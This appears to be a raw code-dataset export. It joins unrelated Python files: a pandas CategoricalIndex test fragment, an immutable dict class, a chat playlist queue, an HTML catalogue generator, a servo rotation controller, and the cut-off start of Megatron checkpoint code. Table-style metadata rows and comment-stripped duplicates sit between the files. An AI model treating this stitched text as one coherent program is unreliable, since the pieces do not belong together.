categories=[u'あ', u'いい', u'ううう'], ordered=False, dtype='category')""" # noqa
assert unicode(idx) == expected
# truncated
idx = pd.CategoricalIndex([u'あ', u'いい', u'ううう'] * 100)
if PY3:
expected = u"""CategoricalIndex(['あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい',
'ううう', 'あ',
...
'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう',
'あ', 'いい', 'ううう'],
categories=['あ', 'いい', 'ううう'], ordered=False, dtype='category', length=300)""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ',
u'いい', u'ううう', u'あ',
...
u'ううう', u'あ', u'いい', u'ううう', u'あ', u'いい',
u'ううう', u'あ', u'いい', u'ううう'],
categories=[u'あ', u'いい', u'ううう'], ordered=False, dtype='category', length=300)""" # noqa
assert unicode(idx) == expected
# larger categories
idx = pd.CategoricalIndex(list(u'あいうえおかきくけこさしすせそ'))
if PY3:
expected = u"""CategoricalIndex(['あ', 'い', 'う', 'え', 'お', 'か', 'き', 'く', 'け', 'こ',
'さ', 'し', 'す', 'せ', 'そ'],
categories=['あ', 'い', 'う', 'え', 'お', 'か', 'き', 'く', ...], ordered=False, dtype='category')""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'あ', u'い', u'う', u'え', u'お', u'か', u'き', u'く',
u'け', u'こ', u'さ', u'し', u'す', u'せ', u'そ'],
categories=[u'あ', u'い', u'う', u'え', u'お', u'か', u'き', u'く', ...], ordered=False, dtype='category')""" # noqa
assert unicode(idx) == expected
def test_fillna_categorical(self):
# GH 11343
idx = CategoricalIndex([1.0, np.nan, 3.0, 1.0], name='x')
# fill by value in categories
exp = CategoricalIndex([1.0, 1.0, 3.0, 1.0], name='x')
tm.assert_index_equal(idx.fillna(1.0), exp)
# fill by value not in categories raises ValueError
with tm.assert_raises_regex(ValueError,
'fill value must be in categories'):
idx.fillna(2.0)
def test_take_fill_value(self):
# GH 12631
# numeric category
idx = pd.CategoricalIndex([1, 2, 3], name='xxx')
result = idx.take(np.array([1, 0, -1]))
expected = pd.CategoricalIndex([2, 1, 3], name='xxx')
tm.assert_index_equal(result, expected)
tm.assert_categorical_equal(result.values, expected.values)
# fill_value
result = idx.take(np.array([1, 0, -1]), fill_value=True)
expected = pd.CategoricalIndex([2, 1, np.nan], categories=[1, 2, 3],
name='xxx')
tm.assert_index_equal(result, expected)
tm.assert_categorical_equal(result.values, expected.values)
# allow_fill=False
result = idx.take(np.array([1, 0, -1]), allow_fill=False,
fill_value=True)
expected = pd.CategoricalIndex([2, 1, 3], name='xxx')
tm.assert_index_equal(result, expected)
tm.assert_categorical_equal(result.values, expected.values)
# object category
idx = pd.CategoricalIndex(list('CBA'), categories=list('ABC'),
ordered=True, name='xxx')
result = idx.take(np.array([1, 0, -1]))
expected = pd.CategoricalIndex(list('BCA'), categories=list('ABC'),
ordered=True, name='xxx')
tm.assert_index_equal(result, expected)
tm.assert_categorical_equal(result.values, expected.values)
# fill_value
result = idx.take(np.array([1, 0, -1]), fill_value=True)
expected = pd.CategoricalIndex(['B', 'C', np.nan],
categories=list('ABC'), ordered=True,
name='xxx')
tm.assert_index_equal(result, expected)
tm.assert_categorical_equal(result.values, expected.values)
# allow_fill=False
result = idx.take(np.array([1, 0, -1]), allow_fill=False,
fill_value=True)
expected = pd.CategoricalIndex(list('BCA'), categories=list('ABC'),
ordered=True, name='xxx')
tm.assert_index_equal(result, expected)
tm.assert_categorical_equal(result.values, expected.values)
msg = ('When allow_fill=True and fill_value is not None, '
'all indices must be >= -1')
with tm.assert_raises_regex(ValueError, msg):
idx.take(np.array([1, 0, -2]), fill_value=True)
with tm.assert_raises_regex(ValueError, msg):
idx.take(np.array([1, 0, -5]), fill_value=True)
with pytest.raises(IndexError):
idx.take(np.array([1, -5]))
def test_take_fill_value_datetime(self):
# datetime category
idx = pd.DatetimeIndex(['2011-01-01', '2011-02-01', '2011-03-01'],
name='xxx')
idx = pd.CategoricalIndex(idx)
result = idx.take(np.array([1, 0, -1]))
expected = pd.DatetimeIndex(['2011-02-01', '2011-01-01', '2011-03-01'],
name='xxx')
expected = pd.CategoricalIndex(expected)
tm.assert_index_equal(result, expected)
# fill_value
result = idx.take(np.array([1, 0, -1]), fill_value=True)
expected = pd.DatetimeIndex(['2011-02-01', '2011-01-01', 'NaT'],
name='xxx')
exp_cats = pd.DatetimeIndex(['2011-01-01', '2011-02-01', '2011-03-01'])
expected = pd.CategoricalIndex(expected, categories=exp_cats)
tm.assert_index_equal(result, expected)
# allow_fill=False
result = idx.take(np.array([1, 0, -1]), allow_fill=False,
fill_value=True)
expected = pd.DatetimeIndex(['2011-02-01', '2011-01-01', '2011-03-01'],
name='xxx')
expected = pd.CategoricalIndex(expected)
tm.assert_index_equal(result, expected)
msg = ('When allow_fill=True and fill_value is not None, '
'all indices must be >= -1')
with tm.assert_raises_regex(ValueError, msg):
idx.take(np.array([1, 0, -2]), fill_value=True)
with tm.assert_raises_regex(ValueError, msg):
idx.take(np.array([1, 0, -5]), fill_value=True)
with pytest.raises(IndexError):
idx.take(np.array([1, -5]))
def test_take_invalid_kwargs(self):
idx = pd.CategoricalIndex([1, 2, 3], name='foo')
indices = [1, 0, -1]
msg = r"take\(\) got an unexpected keyword argument 'foo'"
tm.assert_raises_regex(TypeError, msg, idx.take,
indices, foo=2)
msg = "the 'out' parameter is not supported"
tm.assert_raises_regex(ValueError, msg, idx.take,
indices, out=indices)
msg = "the 'mode' parameter is not supported"
tm.assert_raises_regex(ValueError, msg, idx.take,
indices, mode='clip')
| true | true |
f7328ae4cc169670c4d9df3cd477025254fdd601 | 1,362 | py | Python | python/dazl/prim/map.py | DACH-NY/dazl-client | 56c8b1be047415b2bcb35b6558de4a780a402458 | [
"Apache-2.0"
] | null | null | null | python/dazl/prim/map.py | DACH-NY/dazl-client | 56c8b1be047415b2bcb35b6558de4a780a402458 | [
"Apache-2.0"
] | null | null | null | python/dazl/prim/map.py | DACH-NY/dazl-client | 56c8b1be047415b2bcb35b6558de4a780a402458 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2017-2022 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
__all__ = ["FrozenDict", "to_hashable"]
class FrozenDict(dict):
"""
A special subclass of `dict` that is immutable and hashable. Instances of this "dict" can be
used as keys in a Python dictionary.
"""
def __hash__(self):
return 0
def __delitem__(self, *args, **kwargs):
raise RuntimeError("frozendicts are immutable")
def __setitem__(self, key, value):
raise RuntimeError("frozendicts are immutable")
def pop(self, *args, **kwargs):
raise RuntimeError("frozendicts are immutable")
def popitem(self, *args, **kwargs):
raise RuntimeError("frozendicts are immutable")
def setdefault(self, *args, **kwargs):
raise RuntimeError("frozendicts are immutable")
def update(self, *args, **kwargs):
raise RuntimeError("frozendicts are immutable")
def clear(self, *args, **kwargs):
raise RuntimeError("frozendicts are immutable")
def to_hashable(obj):
from collections import Collection, Mapping
if isinstance(obj, Mapping):
return FrozenDict(obj)
elif isinstance(obj, str):
return obj
elif isinstance(obj, Collection):
return tuple(obj)
else:
return obj
| 27.795918 | 102 | 0.666667 |
__all__ = ["FrozenDict", "to_hashable"]
class FrozenDict(dict):
def __hash__(self):
return 0
def __delitem__(self, *args, **kwargs):
raise RuntimeError("frozendicts are immutable")
def __setitem__(self, key, value):
raise RuntimeError("frozendicts are immutable")
def pop(self, *args, **kwargs):
raise RuntimeError("frozendicts are immutable")
def popitem(self, *args, **kwargs):
raise RuntimeError("frozendicts are immutable")
def setdefault(self, *args, **kwargs):
raise RuntimeError("frozendicts are immutable")
def update(self, *args, **kwargs):
raise RuntimeError("frozendicts are immutable")
def clear(self, *args, **kwargs):
raise RuntimeError("frozendicts are immutable")
def to_hashable(obj):
from collections import Collection, Mapping
if isinstance(obj, Mapping):
return FrozenDict(obj)
elif isinstance(obj, str):
return obj
elif isinstance(obj, Collection):
return tuple(obj)
else:
return obj
| true | true |
f7328b27c5d39fc42635191efb78c9f2abcabf91 | 824 | py | Python | core/queue.py | Kaneki1416/kenKaneki | cdd59c18b74d559d277b736e5e536884ce4e9499 | [
"MIT"
] | 1 | 2022-01-11T21:59:34.000Z | 2022-01-11T21:59:34.000Z | core/queue.py | Kaneki1416/kenKaneki | cdd59c18b74d559d277b736e5e536884ce4e9499 | [
"MIT"
] | 1 | 2022-01-22T14:40:01.000Z | 2022-01-22T14:40:59.000Z | core/queue.py | Kaneki1416/kenKaneki | cdd59c18b74d559d277b736e5e536884ce4e9499 | [
"MIT"
] | 4 | 2021-11-19T12:45:56.000Z | 2022-02-12T03:28:44.000Z | from typing import Dict, List
class Playlist:
def __init__(self):
self.__queue: Dict[int, List[Dict[str, str]]] = {}
def insert_one(self, chat_id: int, data: Dict[str, str]):
if chat_id not in self.__queue:
self.__queue[chat_id] = [data]
else:
queue = self.__queue[chat_id]
queue.extend([data])
def delete_one(self, chat_id: int):
return "not_in_queue" if chat_id not in self.__queue else self.__queue[chat_id].pop(0)
def delete_chat(self, chat_id: int):
if chat_id not in self.__queue:
return "not_in_queue"
del self.__queue[chat_id]
def get_queue(self, chat_id: int):
return self.__queue[chat_id][0]
@property
def playlists(self):
return self.__queue
playlist = Playlist()
| 25.75 | 94 | 0.618932 | from typing import Dict, List
class Playlist:
def __init__(self):
self.__queue: Dict[int, List[Dict[str, str]]] = {}
def insert_one(self, chat_id: int, data: Dict[str, str]):
if chat_id not in self.__queue:
self.__queue[chat_id] = [data]
else:
queue = self.__queue[chat_id]
queue.extend([data])
def delete_one(self, chat_id: int):
return "not_in_queue" if chat_id not in self.__queue else self.__queue[chat_id].pop(0)
def delete_chat(self, chat_id: int):
if chat_id not in self.__queue:
return "not_in_queue"
del self.__queue[chat_id]
def get_queue(self, chat_id: int):
return self.__queue[chat_id][0]
@property
def playlists(self):
return self.__queue
playlist = Playlist()
| true | true |
f7328c285019752a361691904a430d2add9f3a79 | 7,933 | py | Python | smellCatalog/HtmlGenerator.py | neilernst/smells | c093ee72a12f62693d8635359b7ca4958ecba0e0 | [
"MIT"
] | null | null | null | smellCatalog/HtmlGenerator.py | neilernst/smells | c093ee72a12f62693d8635359b7ca4958ecba0e0 | [
"MIT"
] | null | null | null | smellCatalog/HtmlGenerator.py | neilernst/smells | c093ee72a12f62693d8635359b7ca4958ecba0e0 | [
"MIT"
] | 1 | 2019-07-15T14:16:37.000Z | 2019-07-15T14:16:37.000Z | import os
import datetime
import FixedText
class HtmlGenerator(object):
def __init__(self, output_path, smell_list, category_list):
self.smell_list = smell_list
self.out_path = output_path
self.category_list = category_list
def generate(self):
self.generate_index()
self.generate_categories()
for smell in self.smell_list:
self.generate_html(smell)
def generate_categories(self):
for cat in self.category_list:
self.generate_category(cat)
def get_child_categories(self, category):
result = []
for cat in self.category_list:
if (cat.parent_obj == category):
result.append(cat)
return result
def generate_category(self, category):
path = os.path.join(self.out_path, category.id + ".html")
self.writeFile(path, FixedText.TOP_TEXT)
self.appendFile(path, FixedText.BODY_TOP_PART)
self.appendFile(path, FixedText.BODY_INDEX)
cat_list = sorted(self.category_list, key=lambda cat: cat.name)
for cat in cat_list:
if (cat.parent_obj == None):
text = "<a href=\"" + cat.id + ".html\" class=\"w3-bar-item w3-button w3-hover-white\">" + cat.name + "</a>"
self.appendFile(path, text)
self.appendFile(path, FixedText.BODY_LOW_PART)
self.appendFile(path, FixedText.BODY_MAIN_TOP)
child_categories = self.get_child_categories(category)
if (len(child_categories)>0):
self.appendFile(path, "<h2>(Sub-)Categories</h2>")
self.appendFile(path, "<ul>")
for cat in child_categories:
sub_text = "<li><a href=\"" + cat.id + ".html\"><h4>" + cat.name + "</h4></a></li>"
self.appendFile(path, sub_text)
self.appendFile(path, "</ul>")
else:
self.appendFile(path, "<h2>" + category.name + "</h2>")
self.appendFile(path, "<ol>")
for smell in self.smell_list:
if (smell.category==category.id):
smell_text = "<li><a href=\"" + smell.id + ".html\">" + smell.name + "</a></li>"
self.appendFile(path, smell_text)
self.appendFile(path, "</ol>")
self.appendFile(path, "<hr>")
self.appendFile(path, "<a href=\"index.html\"><h3>Home</h3></a>")
self.appendFile(path, "</div>")
self.appendFile(path, FixedText.ATTRIBUTION_TEXT)
self.appendFile(path, FixedText.TRACKING_TEXT)
self.appendFile(path, FixedText.SOCIAL_TEXT)
self.appendFile(path, FixedText.HTML_END_TEXT)
def generate_index(self):
path = os.path.join(self.out_path, "index.html")
self.writeFile(path, FixedText.TOP_TEXT)
self.appendFile(path, FixedText.BODY_TOP_PART)
self.appendFile(path, FixedText.BODY_INDEX)
cat_list = sorted(self.category_list, key=lambda cat: cat.name)
for cat in cat_list:
if (cat.parent_obj == None):
text = "<a href=\"" + cat.id + ".html\" class=\"w3-bar-item w3-button w3-hover-white\">" + cat.name + "</a>"
self.appendFile(path, text)
self.appendFile(path, FixedText.BODY_LOW_PART)
self.appendFile(path, FixedText.BODY_MAIN_TOP)
self.appendFile(path, FixedText.INTRO_TEXT)
self.appendFile(path, "<ul>")
for cat in cat_list:
if (cat.parent_obj == None):
if(self.total_sub_categories(cat) > 0 ):
text = "<li><h4><a href=\"" + cat.id + ".html\">" + cat.name + "</a></h4></li>"
else:
count = self.get_smell_count_in_category(cat)
text = "<li><h4><a href=\"" + cat.id + ".html\">" + cat.name + " (" + str(count) + ")</a></h4></li>"
self.appendFile(path, text)
self.appendFile(path, "<ul>")
for subCat in cat_list:
if self.is_sub_category(subCat, cat):
count = self.get_smell_count_in_category(subCat)
sub_text = "<li><h5><a href=\"" + subCat.id + ".html\">" + subCat.name + " (" + str(count) + ")</a></h5></li>"
self.appendFile(path, sub_text)
self.appendFile(path, "</ul>")
self.appendFile(path, "</ul>")
total_text = "<p><b>Total documented smells: " + str(len(self.smell_list)) + "</b></p>"
self.appendFile(path, total_text)
self.appendFile(path, FixedText.HOW_TEXT)
self.appendFile(path, FixedText.ADDITIONAL_TEXT)
self.appendFile(path, FixedText.ACKOWLEDGEMENTS)
today = datetime.datetime.today()
self.appendFile(path, "<hr><p>Last updated: " + str(today.strftime("%B %d, %Y")) + "</p>")
self.appendFile(path, "</div>")
self.appendFile(path, FixedText.ATTRIBUTION_TEXT)
self.appendFile(path, FixedText.TRACKING_TEXT)
self.appendFile(path, FixedText.SOCIAL_TEXT)
self.appendFile(path, FixedText.HTML_END_TEXT)
def writeFile(self, fileName, text):
file = os.path.abspath(fileName)
with open(file, "w", errors='ignore') as f:
f.write(text)
def appendFile(self, fileName, text):
file = os.path.abspath(fileName)
with open(file, "a", errors='ignore') as f:
f.write(text)
def generate_html(self, smell):
path = os.path.join(self.out_path, smell.id + ".html")
self.writeFile(path, FixedText.TOP_TEXT)
self.appendFile(path, FixedText.BODY_TOP_PART)
self.appendFile(path, FixedText.BODY_INDEX)
cat_list = sorted(self.category_list, key=lambda cat: cat.name)
for cat in cat_list:
if (cat.parent_obj == None):
text = "<a href=\"" + cat.id + ".html\" class=\"w3-bar-item w3-button w3-hover-white\">" + cat.name + "</a>"
self.appendFile(path, text)
self.appendFile(path, FixedText.BODY_LOW_PART)
self.appendFile(path, FixedText.BODY_MAIN_TOP)
smell_name = "<h3>" + smell.name + "</h3>"
self.appendFile(path, smell_name)
smell_description = "<p>" + smell.description + "</p>"
self.appendFile(path, smell_description)
if(len(smell.aka_obj_list)>0):
aka_text = "<p>Related smells: "
for aka in smell.aka_obj_list:
aka_text += "<a href=\"" + aka.id + ".html\">" + aka.name + "</a> "
aka_text += "</p>"
self.appendFile(path, aka_text)
if smell.ref_obj != None:
self.appendFile(path, "<h4>Reference</h4>")
if smell.ref_obj.url == "":
self.appendFile(path, "<p>" + smell.ref_obj.text + "</p>")
else:
self.appendFile(path, "<p><a href=\"" + smell.ref_obj.url + "\">" + smell.ref_obj.text + "</a></p>")
self.appendFile(path, "<hr>")
self.appendFile(path, "<a href=\"" + smell.category_obj.id + ".html\"><h4>" + smell.category_obj.name + "</h4></a>")
self.appendFile(path, "<a href=\"index.html\"><h3>Home</h3></a>")
self.appendFile(path, "</div>")
self.appendFile(path, FixedText.ATTRIBUTION_TEXT)
self.appendFile(path, FixedText.TRACKING_TEXT)
self.appendFile(path, FixedText.SOCIAL_TEXT)
self.appendFile(path, FixedText.HTML_END_TEXT)
def get_smell_count_in_category(self, cat):
count = 0
for smell in self.smell_list:
if smell.category_obj == cat:
count += 1
return count
def is_sub_category(self, subCat, cat):
if subCat.parent_obj == cat:
return True
return False
def total_sub_categories(self, cat):
count = 0
for category in self.category_list:
if category.parent_obj == cat:
count += 1
return count | 46.122093 | 134 | 0.576201 | import os
import datetime
import FixedText
class HtmlGenerator(object):
def __init__(self, output_path, smell_list, category_list):
self.smell_list = smell_list
self.out_path = output_path
self.category_list = category_list
def generate(self):
self.generate_index()
self.generate_categories()
for smell in self.smell_list:
self.generate_html(smell)
def generate_categories(self):
for cat in self.category_list:
self.generate_category(cat)
def get_child_categories(self, category):
result = []
for cat in self.category_list:
if (cat.parent_obj == category):
result.append(cat)
return result
def generate_category(self, category):
path = os.path.join(self.out_path, category.id + ".html")
self.writeFile(path, FixedText.TOP_TEXT)
self.appendFile(path, FixedText.BODY_TOP_PART)
self.appendFile(path, FixedText.BODY_INDEX)
cat_list = sorted(self.category_list, key=lambda cat: cat.name)
for cat in cat_list:
if (cat.parent_obj == None):
text = "<a href=\"" + cat.id + ".html\" class=\"w3-bar-item w3-button w3-hover-white\">" + cat.name + "</a>"
self.appendFile(path, text)
self.appendFile(path, FixedText.BODY_LOW_PART)
self.appendFile(path, FixedText.BODY_MAIN_TOP)
child_categories = self.get_child_categories(category)
if (len(child_categories)>0):
self.appendFile(path, "<h2>(Sub-)Categories</h2>")
self.appendFile(path, "<ul>")
for cat in child_categories:
sub_text = "<li><a href=\"" + cat.id + ".html\"><h4>" + cat.name + "</h4></a></li>"
self.appendFile(path, sub_text)
self.appendFile(path, "</ul>")
else:
self.appendFile(path, "<h2>" + category.name + "</h2>")
self.appendFile(path, "<ol>")
for smell in self.smell_list:
if (smell.category==category.id):
smell_text = "<li><a href=\"" + smell.id + ".html\">" + smell.name + "</a></li>"
self.appendFile(path, smell_text)
self.appendFile(path, "</ol>")
self.appendFile(path, "<hr>")
self.appendFile(path, "<a href=\"index.html\"><h3>Home</h3></a>")
self.appendFile(path, "</div>")
self.appendFile(path, FixedText.ATTRIBUTION_TEXT)
self.appendFile(path, FixedText.TRACKING_TEXT)
self.appendFile(path, FixedText.SOCIAL_TEXT)
self.appendFile(path, FixedText.HTML_END_TEXT)
def generate_index(self):
path = os.path.join(self.out_path, "index.html")
self.writeFile(path, FixedText.TOP_TEXT)
self.appendFile(path, FixedText.BODY_TOP_PART)
self.appendFile(path, FixedText.BODY_INDEX)
cat_list = sorted(self.category_list, key=lambda cat: cat.name)
for cat in cat_list:
if (cat.parent_obj == None):
text = "<a href=\"" + cat.id + ".html\" class=\"w3-bar-item w3-button w3-hover-white\">" + cat.name + "</a>"
self.appendFile(path, text)
self.appendFile(path, FixedText.BODY_LOW_PART)
self.appendFile(path, FixedText.BODY_MAIN_TOP)
self.appendFile(path, FixedText.INTRO_TEXT)
self.appendFile(path, "<ul>")
for cat in cat_list:
if (cat.parent_obj == None):
if(self.total_sub_categories(cat) > 0 ):
text = "<li><h4><a href=\"" + cat.id + ".html\">" + cat.name + "</a></h4></li>"
else:
count = self.get_smell_count_in_category(cat)
text = "<li><h4><a href=\"" + cat.id + ".html\">" + cat.name + " (" + str(count) + ")</a></h4></li>"
self.appendFile(path, text)
self.appendFile(path, "<ul>")
for subCat in cat_list:
if self.is_sub_category(subCat, cat):
count = self.get_smell_count_in_category(subCat)
sub_text = "<li><h5><a href=\"" + subCat.id + ".html\">" + subCat.name + " (" + str(count) + ")</a></h5></li>"
self.appendFile(path, sub_text)
self.appendFile(path, "</ul>")
self.appendFile(path, "</ul>")
total_text = "<p><b>Total documented smells: " + str(len(self.smell_list)) + "</b></p>"
self.appendFile(path, total_text)
self.appendFile(path, FixedText.HOW_TEXT)
self.appendFile(path, FixedText.ADDITIONAL_TEXT)
self.appendFile(path, FixedText.ACKOWLEDGEMENTS)
today = datetime.datetime.today()
self.appendFile(path, "<hr><p>Last updated: " + str(today.strftime("%B %d, %Y")) + "</p>")
self.appendFile(path, "</div>")
self.appendFile(path, FixedText.ATTRIBUTION_TEXT)
self.appendFile(path, FixedText.TRACKING_TEXT)
self.appendFile(path, FixedText.SOCIAL_TEXT)
self.appendFile(path, FixedText.HTML_END_TEXT)
def writeFile(self, fileName, text):
file = os.path.abspath(fileName)
with open(file, "w", errors='ignore') as f:
f.write(text)
def appendFile(self, fileName, text):
file = os.path.abspath(fileName)
with open(file, "a", errors='ignore') as f:
f.write(text)
def generate_html(self, smell):
path = os.path.join(self.out_path, smell.id + ".html")
self.writeFile(path, FixedText.TOP_TEXT)
self.appendFile(path, FixedText.BODY_TOP_PART)
self.appendFile(path, FixedText.BODY_INDEX)
cat_list = sorted(self.category_list, key=lambda cat: cat.name)
for cat in cat_list:
if (cat.parent_obj == None):
text = "<a href=\"" + cat.id + ".html\" class=\"w3-bar-item w3-button w3-hover-white\">" + cat.name + "</a>"
self.appendFile(path, text)
self.appendFile(path, FixedText.BODY_LOW_PART)
self.appendFile(path, FixedText.BODY_MAIN_TOP)
smell_name = "<h3>" + smell.name + "</h3>"
self.appendFile(path, smell_name)
smell_description = "<p>" + smell.description + "</p>"
self.appendFile(path, smell_description)
if(len(smell.aka_obj_list)>0):
aka_text = "<p>Related smells: "
for aka in smell.aka_obj_list:
aka_text += "<a href=\"" + aka.id + ".html\">" + aka.name + "</a> "
aka_text += "</p>"
self.appendFile(path, aka_text)
if smell.ref_obj != None:
self.appendFile(path, "<h4>Reference</h4>")
if smell.ref_obj.url == "":
self.appendFile(path, "<p>" + smell.ref_obj.text + "</p>")
else:
self.appendFile(path, "<p><a href=\"" + smell.ref_obj.url + "\">" + smell.ref_obj.text + "</a></p>")
self.appendFile(path, "<hr>")
self.appendFile(path, "<a href=\"" + smell.category_obj.id + ".html\"><h4>" + smell.category_obj.name + "</h4></a>")
self.appendFile(path, "<a href=\"index.html\"><h3>Home</h3></a>")
self.appendFile(path, "</div>")
self.appendFile(path, FixedText.ATTRIBUTION_TEXT)
self.appendFile(path, FixedText.TRACKING_TEXT)
self.appendFile(path, FixedText.SOCIAL_TEXT)
self.appendFile(path, FixedText.HTML_END_TEXT)
def get_smell_count_in_category(self, cat):
count = 0
for smell in self.smell_list:
if smell.category_obj == cat:
count += 1
return count
def is_sub_category(self, subCat, cat):
if subCat.parent_obj == cat:
return True
return False
def total_sub_categories(self, cat):
count = 0
for category in self.category_list:
if category.parent_obj == cat:
count += 1
return count | true | true |
f7328d27708be173337c84cd136370e78d9f3791 | 1,827 | py | Python | controller/test5_hw_test/rotate_axis.py | drummonds/od-robot | a74954aefecb49654686dc0539ea23cb915c6f4d | [
"MIT"
] | null | null | null | controller/test5_hw_test/rotate_axis.py | drummonds/od-robot | a74954aefecb49654686dc0539ea23cb915c6f4d | [
"MIT"
] | null | null | null | controller/test5_hw_test/rotate_axis.py | drummonds/od-robot | a74954aefecb49654686dc0539ea23cb915c6f4d | [
"MIT"
] | null | null | null | from machine import Pin, PWM
import pycom
import time
class Rotate:
# Servo to fixed position
def __init__(self, pwm):
# Assum 50ms timer already set up and going to reuse
self.pwm = pwm
self.is_active = False
self.at_position = 50
def run(self):
pass
def state_text(self):
return 'Rotate position = {}'.format(self.at_position)
def activate(self, start_dc=0.15):
# May not be switched on
if not self.is_active:
self.is_active = True
self.pwm_c = self.pwm.channel(2, pin='G13', duty_cycle=start_dc)
def set_position(self, position): # Converts to 1 -2 ms pulses
self.at_position = position
# speed in %
dc = (position / 100.0) * (1/20) + (1/20)
self.activate(start_dc=dc)
self.pwm_c.duty_cycle(dc)
return dc
def wait_set_position(self, position):
"""Rotates and waits until rotate gets there. Guess time from
assuming a constant rotation speed"""
full_rotate_time = 3000 # ms
# Estiamte on rotation at full speed
time_estimate = full_rotate_time * abs(self.at_position - position) / 100
# Allow for creep which can take a minimum time
if self.at_position - position != 0:
time_estimate = min(int(time_estimate), 1500)
self.set_position(position)
time.sleep_ms(int(time_estimate))
def shutdown(self):
# Ideally won't move servo
self.pwm_off = Pin('G13', mode=Pin.IN, pull=Pin.PULL_UP)
self.is_active = False
def in_bin(self):
self.wait_set_position(86)
def out_bin(self):
self.wait_set_position(12) # min diff seems to be 2
self.wait_set_position(14)
def dvd(self):
self.wait_set_position(50)
| 30.966102 | 81 | 0.621237 | from machine import Pin, PWM
import pycom
import time
class Rotate:
def __init__(self, pwm):
self.pwm = pwm
self.is_active = False
self.at_position = 50
def run(self):
pass
def state_text(self):
return 'Rotate position = {}'.format(self.at_position)
def activate(self, start_dc=0.15):
if not self.is_active:
self.is_active = True
self.pwm_c = self.pwm.channel(2, pin='G13', duty_cycle=start_dc)
def set_position(self, position):
self.at_position = position
dc = (position / 100.0) * (1/20) + (1/20)
self.activate(start_dc=dc)
self.pwm_c.duty_cycle(dc)
return dc
def wait_set_position(self, position):
full_rotate_time = 3000
time_estimate = full_rotate_time * abs(self.at_position - position) / 100
if self.at_position - position != 0:
time_estimate = min(int(time_estimate), 1500)
self.set_position(position)
time.sleep_ms(int(time_estimate))
def shutdown(self):
self.pwm_off = Pin('G13', mode=Pin.IN, pull=Pin.PULL_UP)
self.is_active = False
def in_bin(self):
self.wait_set_position(86)
def out_bin(self):
self.wait_set_position(12) # min diff seems to be 2
self.wait_set_position(14)
def dvd(self):
self.wait_set_position(50)
| true | true |
f7328dcbb442c75712e43ef7b1e1e4a6045a4a4e | 18,431 | py | Python | megatron/checkpointing.py | adammoody/Megatron-DeepSpeed | 972211163608818fe9e5ba821246f18d0a5dc264 | [
"MIT"
] | null | null | null | megatron/checkpointing.py | adammoody/Megatron-DeepSpeed | 972211163608818fe9e5ba821246f18d0a5dc264 | [
"MIT"
] | null | null | null | megatron/checkpointing.py | adammoody/Megatron-DeepSpeed | 972211163608818fe9e5ba821246f18d0a5dc264 | [
"MIT"
] | null | null | null | # coding=utf-8
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Input/output checkpointing."""
import os
import random
import sys
import numpy as np
import torch
from megatron.global_vars import codecarbon_tracker_flush
from megatron import (get_args,
mpu,
print_rank_0,
update_num_microbatches,
utils)
_CHECKPOINT_VERSION = None
def set_checkpoint_version(value):
global _CHECKPOINT_VERSION
if _CHECKPOINT_VERSION is not None:
assert _CHECKPOINT_VERSION == value, \
"checkpoint versions do not match"
_CHECKPOINT_VERSION = value
def get_checkpoint_version():
global _CHECKPOINT_VERSION
return _CHECKPOINT_VERSION
def check_checkpoint_args(checkpoint_args):
"""Ensure fixed arguments for a model are the same for the input
arguments and the one retrieved from checkpoint."""
args = get_args()
def _compare(arg_name, old_arg_name=None):
if old_arg_name is not None:
checkpoint_value = getattr(checkpoint_args, old_arg_name)
else:
checkpoint_value = getattr(checkpoint_args, arg_name)
args_value = getattr(args, arg_name)
error_message = '{} value from checkpoint ({}) is not equal to the ' \
'input argument value ({}).'.format(
arg_name, checkpoint_value, args_value)
assert checkpoint_value == args_value, error_message
_compare('num_layers')
_compare('hidden_size')
_compare('num_attention_heads')
_compare('max_position_embeddings')
_compare('position_embedding_type')
if args.vocab_file:
_compare('make_vocab_size_divisible_by')
_compare('padded_vocab_size')
_compare('tokenizer_type')
if get_checkpoint_version() < 3.0:
_compare('tensor_model_parallel_size',
old_arg_name='model_parallel_size')
if get_checkpoint_version() >= 3.0:
_compare('tensor_model_parallel_size')
_compare('pipeline_model_parallel_size')
def ensure_directory_exists(filename):
"""Build filename's path if it does not already exists."""
dirname = os.path.dirname(filename)
if not os.path.exists(dirname):
os.makedirs(dirname)
def get_checkpoint_name(checkpoints_path, iteration,
release=False):
"""A unified checkpoint name."""
if release:
directory = 'release'
else:
directory = 'iter_{:07d}'.format(iteration)
# Use both the tensor and pipeline MP rank.
if mpu.get_pipeline_model_parallel_world_size() == 1:
return os.path.join(checkpoints_path, directory,
'mp_rank_{:02d}'.format(
mpu.get_tensor_model_parallel_rank()),
'model_optim_rng.pt')
return os.path.join(checkpoints_path, directory,
'mp_rank_{:02d}_{:03d}'.format(
mpu.get_tensor_model_parallel_rank(),
mpu.get_pipeline_model_parallel_rank()),
'model_optim_rng.pt')
def get_checkpoint_tracker_filename(checkpoints_path):
"""Tracker file rescords the latest chckpoint during
training to restart from."""
return os.path.join(checkpoints_path, 'latest_checkpointed_iteration.txt')
def save_checkpoint(iteration, model, optimizer, lr_scheduler):
"""Save a model checkpoint."""
args = get_args()
# Only rank zero of the data parallel writes to the disk.
if not args.deepspeed:
model = utils.unwrap_model(model)
print_rank_0('saving checkpoint at iteration {:7d} to {}'.format(
iteration, args.save))
if not torch.distributed.is_initialized() or mpu.get_data_parallel_rank() == 0 \
or args.deepspeed:
# Arguments, iteration, and model.
state_dict = {}
state_dict['args'] = args
state_dict['checkpoint_version'] = 3.0
state_dict['iteration'] = iteration
# DeepSpeed saves the model/optimizer/scheduler
if not args.deepspeed:
if len(model) == 1:
state_dict['model'] = model[0].state_dict_for_save_checkpoint()
else:
for i in range(len(model)):
mpu.set_virtual_pipeline_model_parallel_rank(i)
